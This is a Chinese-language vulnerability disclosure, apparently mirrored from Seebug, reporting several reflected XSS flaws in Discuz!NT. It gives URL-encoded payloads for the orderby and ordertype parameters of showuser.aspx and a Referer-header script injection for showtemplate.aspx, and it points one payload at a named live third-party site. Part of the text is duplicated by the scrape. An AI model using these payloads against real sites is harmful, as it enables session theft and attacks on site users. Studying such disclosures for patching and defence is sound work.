VULHUB ™

### 简要描述： 我估计是被忽略的节奏~ ### 详细说明： Discuz!NT存在多处反射型XSS，反射XSS本身都不好意思发出来的，但是看了下用户量很大（关键字：Powered by Discuz!NT）啊，关键是全版本通杀，综合利用起来危害和影响还是不小吧！ 这里我们拿Discuz!NT 3.6.601测试 第一处XSS 在showuser.aspx页面的ordertype参数 http://127.0.0.1/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 [<img src="https://images.seebug.org/upload/201405/07091615605043b35676e92f392645e1ba219b90.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07091615605043b35676e92f392645e1ba219b90.png) 第二处XSS 在showuser.aspx页面的orderby参数 http://127.0.0.1/showuser.aspx?orderby=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&ordertype=111111&page=1 [<img src="https://images.seebug.org/upload/201405/07091626c28009ba6deff3d1b9daa82187b7744e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07091626c28009ba6deff3d1b9daa82187b7744e.png) 第三处XSS...

### 简要描述： 我估计是被忽略的节奏~ ### 详细说明： Discuz!NT存在多处反射型XSS，反射XSS本身都不好意思发出来的，但是看了下用户量很大（关键字：Powered by Discuz!NT）啊，关键是全版本通杀，综合利用起来危害和影响还是不小吧！ 这里我们拿Discuz!NT 3.6.601测试 第一处XSS 在showuser.aspx页面的ordertype参数 http://127.0.0.1/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 [<img src="https://images.seebug.org/upload/201405/07091615605043b35676e92f392645e1ba219b90.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07091615605043b35676e92f392645e1ba219b90.png) 第二处XSS 在showuser.aspx页面的orderby参数 http://127.0.0.1/showuser.aspx?orderby=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&ordertype=111111&page=1 [<img src="https://images.seebug.org/upload/201405/07091626c28009ba6deff3d1b9daa82187b7744e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07091626c28009ba6deff3d1b9daa82187b7744e.png) 第三处XSS 在showtemplate.aspx页面的头信息，Referer中 链接：http://10.65.40.6/showtemplate.aspx POST：templateid=1 Referer: `"></meta><ScRipt>alert(1);</ScRipt>` [<img src="https://images.seebug.org/upload/201405/070916369e1eb18bf9f96f094ae1603ffce65ecb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/070916369e1eb18bf9f96f094ae1603ffce65ecb.png) ### 漏洞证明： 在给一个Discuz!NT 3.9.913版本证明： http://www.tianlubike.com/ http://www.tianlubike.com/showuser.aspx?orderby=atestu&ordertype=%22%3C/script%3E%3Caudio%20src=fdifgk%20onerror=alert%281%29%3E&page=1 [<img src="https://images.seebug.org/upload/201405/070917498119407e8d5938e40d37a8b4210ccc84.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/070917498119407e8d5938e40d37a8b4210ccc84.png)